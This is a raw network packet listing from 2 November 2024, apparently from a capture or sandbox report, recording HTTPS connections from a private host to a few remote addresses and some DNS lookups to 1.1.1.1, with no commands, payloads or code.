Nov 2, 2024 17:56:38.469960928 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.482743979 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.483428955 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.483453035 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.483843088 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.483849049 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.555325985 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.559360027 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.559384108 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.560081005 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.560097933 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.560107946 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.560349941 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.560937881 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.561161041 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.561177969 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.561203003 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.561208963 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.564750910 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.564785004 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.564872026 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.565042973 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.565056086 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.598978043 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.599123955 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.599193096 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.599414110 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.599432945 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.599442959 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.599448919 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.602741957 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.602786064 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.602852106 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.603105068 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.603120089 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.614543915 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.614636898 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.614696026 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.614800930 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.614821911 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.614834070 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.614840031 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.618864059 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.618906975 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.619035959 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.619149923 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.619160891 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.689610958 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.689758062 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.689807892 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.690004110 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.690022945 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.690038919 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.690046072 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.693008900 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.693052053 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.693173885 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.693444014 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.693460941 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.847449064 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.848261118 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.848289967 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.848452091 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.848457098 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.980540991 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.980613947 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.980700016 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.992384911 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.992393970 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.992543936 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.992551088 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.001715899 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.001753092 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.001920938 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.002273083 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.002329111 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.326819897 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.371571064 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.375868082 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.380547047 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.386372089 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.386385918 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.388190031 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.388197899 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.389751911 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.389782906 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.390394926 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.390402079 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.391108990 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.391124964 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.395874023 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.395879984 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.447091103 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.458650112 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.458650112 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.458666086 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.458686113 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.518726110 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.519087076 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.519192934 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.519475937 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.519494057 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.519660950 CET	49799	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.519668102 CET	443	49799	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.523212910 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.523508072 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.523987055 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.526021004 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.526115894 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.526129961 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.526161909 CET	49800	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.526170969 CET	443	49800	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.526211023 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.526345015 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.528918028 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.528934002 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.528968096 CET	49801	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.528980017 CET	443	49801	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.531559944 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.531595945 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.531737089 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.533233881 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.533272028 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.533289909 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.533308983 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.533339977 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.533787966 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.533796072 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.535240889 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.535262108 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.535336018 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.535631895 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.535645008 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.585263014 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.585331917 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.587867975 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.599383116 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.599411011 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.599428892 CET	49802	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.599436998 CET	443	49802	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.611336946 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.611377001 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.611577988 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.612189054 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.612200975 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.739907026 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.797456980 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.827303886 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.827327967 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.827876091 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.827879906 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.955538034 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.955724001 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:39.955800056 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.983308077 CET	49803	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:39.983346939 CET	443	49803	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.119810104 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.119851112 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.119935989 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.174710035 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.174729109 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.294739962 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.295342922 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.304369926 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.344208002 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.344232082 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.344270945 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.385193110 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.385193110 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.385215044 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.385234118 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.385715008 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.385723114 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.385905027 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.385910034 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.386256933 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.386301041 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.386662960 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.386677980 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514120102 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514199972 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514286995 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.514486074 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514509916 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514611006 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.514621973 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514729977 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.514821053 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.516824961 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.517075062 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.517143965 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.547056913 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.547092915 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.547111034 CET	49806	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.547118902 CET	443	49806	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.548747063 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.548758030 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.548772097 CET	49804	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.548777103 CET	443	49804	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.554685116 CET	49805	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.554737091 CET	443	49805	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.576387882 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.620357037 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.691384077 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.691435099 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.692171097 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.692178965 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.821784973 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.821810961 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.821870089 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.821888924 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.821979046 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.888626099 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.888655901 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.888681889 CET	49807	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.888688087 CET	443	49807	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.907255888 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:40.907680035 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.912441969 CET	53	49813	1.1.1.1	192.168.2.7
Nov 2, 2024 17:56:40.912494898 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:40.920173883 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.920209885 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.920273066 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.929976940 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.929997921 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.930289030 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.930294037 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.932956934 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.933006048 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.933069944 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.933240891 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.933254004 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.934066057 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.934083939 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.934199095 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.934199095 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.934227943 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.946893930 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.946913004 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.962217093 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:40.962259054 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:40.962342978 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:40.962744951 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:40.962770939 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:40.963222027 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:40.963236094 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:40.966542959 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.966558933 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.966634035 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.966993093 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:40.967003107 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:40.967535973 CET	53	49813	1.1.1.1	192.168.2.7
Nov 2, 2024 17:56:40.967546940 CET	53	49813	1.1.1.1	192.168.2.7
Nov 2, 2024 17:56:41.056143045 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.056164026 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.056219101 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.056257963 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.056324005 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.091336966 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.091373920 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.091413021 CET	49808	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.091419935 CET	443	49808	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.181399107 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.181452036 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.182430029 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.203504086 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.203520060 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.515626907 CET	53	49813	1.1.1.1	192.168.2.7
Nov 2, 2024 17:56:41.545573950 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:41.550960064 CET	53	49813	1.1.1.1	192.168.2.7
Nov 2, 2024 17:56:41.551084042 CET	49813	53	192.168.2.7	1.1.1.1
Nov 2, 2024 17:56:41.676820993 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.688493013 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.689197063 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.748155117 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.748189926 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.748651981 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.748661041 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.749275923 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.749289036 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.749856949 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.749862909 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.754786015 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.754801989 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.755203009 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.755208969 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.877382040 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.877448082 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.877677917 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.885404110 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.885426998 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.885482073 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.885483027 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.885529995 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.896609068 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.896764040 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.896827936 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:41.913825989 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:41.940320969 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.007720947 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.007769108 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.008347988 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.008353949 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.008620977 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.008635998 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.009097099 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.009109020 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.009119987 CET	49817	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.009125948 CET	443	49817	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.009203911 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.009207964 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.009300947 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.009300947 CET	49815	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.009315968 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.009326935 CET	443	49815	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.010601044 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.010601044 CET	49816	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.010638952 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.010675907 CET	443	49816	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.057013988 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.097220898 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.097250938 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.098517895 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.098607063 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.101444006 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.101516008 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.101572990 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.119724035 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.119760990 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.119884014 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.123296976 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.123332977 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.123420954 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.124052048 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.124089956 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.124768972 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.124804020 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.124867916 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.127615929 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.127633095 CET	443	49825	13.107.246.45	192.168.2.7
